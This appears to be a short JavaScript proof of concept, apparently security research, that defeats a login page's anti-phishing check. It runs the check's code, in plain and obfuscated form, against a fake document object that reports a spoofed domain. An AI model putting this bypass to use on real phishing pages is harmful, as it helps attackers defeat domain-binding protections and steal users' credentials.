//It is possible to overcome the phishing protection by wrapping a wrapper around each JavaScript in the login page.
// The following POC is intended to show how to overcome the phishing protection from the video (https://www.youtube.com/watch?v=C-Fh4sIdY8c).

function wrapper(document) {
	function elementToObject(el) {	
		var o = {
			tag: el.tagName,
			baseURI: el.baseURI,
			children: []
		};

		var i=0
		if(el.children.length) {
		   	i=0;
			for(i;i<el.children.length;i++){
				o.children[i] = elementToObject(el.children[i]);
				console.log(o.children[i]);
			}
		}
		return o;
	}

	var secret = JSON.stringify(elementToObject(document.querySelector("body")));
	console.log("spooft-secret "+secret);
}

var mydocSpoof = {querySelector: function () {return {tagName:"form",baseURI:"www.spoofed-domain.test",children: []}}}
wrapper(mydocSpoof)

#############################################################################################################################
//The obfuscated variant can also be overcome. The wrapper works in the same way as with plain text code.

function wrapper(document) {

	function _0x4abb(_0xa856e1,_0x70d9a){var _0x2b5721=_0x2b57();return _0x4abb=function(_0x4abb71,_0x460f4d){_0x4abb71=_0x4abb71-0xe3;var _0x16e76a=_0x2b5721[_0x4abb71];return _0x16e76a;},_0x4abb(_0xa856e1,_0x70d9a);}var _0x4cd920=_0x4abb;(function(_0x2a8c44,_0x209b11){var _0xc12061=_0x4abb,_0x5b5322=_0x2a8c44();while(!![]){try{var _0x58b7fa=-parseInt(_0xc12061(0xf5))/0x1*(-parseInt(_0xc12061(0xe8))/0x2)+-parseInt(_0xc12061(0xf1))/0x3*(-parseInt(_0xc12061(0xe4))/0x4)+parseInt(_0xc12061(0xe3))/0x5*(-parseInt(_0xc12061(0xec))/0x6)+-parseInt(_0xc12061(0xf4))/0x7+parseInt(_0xc12061(0xeb))/0x8+-parseInt(_0xc12061(0xe5))/0x9+-parseInt(_0xc12061(0xef))/0xa*(parseInt(_0xc12061(0xf0))/0xb);if(_0x58b7fa===_0x209b11)break;else _0x5b5322['push'](_0x5b5322['shift']());}catch(_0x916e1b){_0x5b5322['push'](_0x5b5322['shift']());}}}(_0x2b57,0x43082));function elementToObject(_0x224ea8){var _0x5e36a8=_0x4abb,_0x531e81={'tag':_0x224ea8[_0x5e36a8(0xe7)],'baseURI':_0x224ea8['baseURI'],'children':[]},_0x208add=0x0;if(_0x224ea8[_0x5e36a8(0xf2)][_0x5e36a8(0xe6)]){_0x208add=0x0;for(_0x208add;_0x208add<_0x224ea8['children']['length'];_0x208add++){_0x531e81[_0x5e36a8(0xf2)][_0x208add]=elementToObject(_0x224ea8[_0x5e36a8(0xf2)][_0x208add]),console['log'](_0x531e81[_0x5e36a8(0xf2)][_0x208add]);}}return _0x531e81;}function _0x2b57(){var _0x58886f=['2WLLCip','body','spooft-secret\x20','3602048QOPqcH','6UTqHSn','stringify','log','764410LpvcJR','11XomPxn','15eKJxtt','children','querySelector','1375962NkUfNQ','418667FcHdTM','735065tfklWF','258508syVegt','4477284DqHJkr','length','tagName'];_0x2b57=function(){return _0x58886f;};return _0x2b57();}var secret=JSON[_0x4cd920(0xed)](elementToObject(document[_0x4cd920(0xf3)](_0x4cd920(0xe9))));console[_0x4cd920(0xee)](_0x4cd920(0xea)+secret);

}

var mydocSpoof = {querySelector: function () {return {tagName:"form",baseURI:"www.spoofed-domain.test",children: []}}}
wrapper(mydocSpoof)
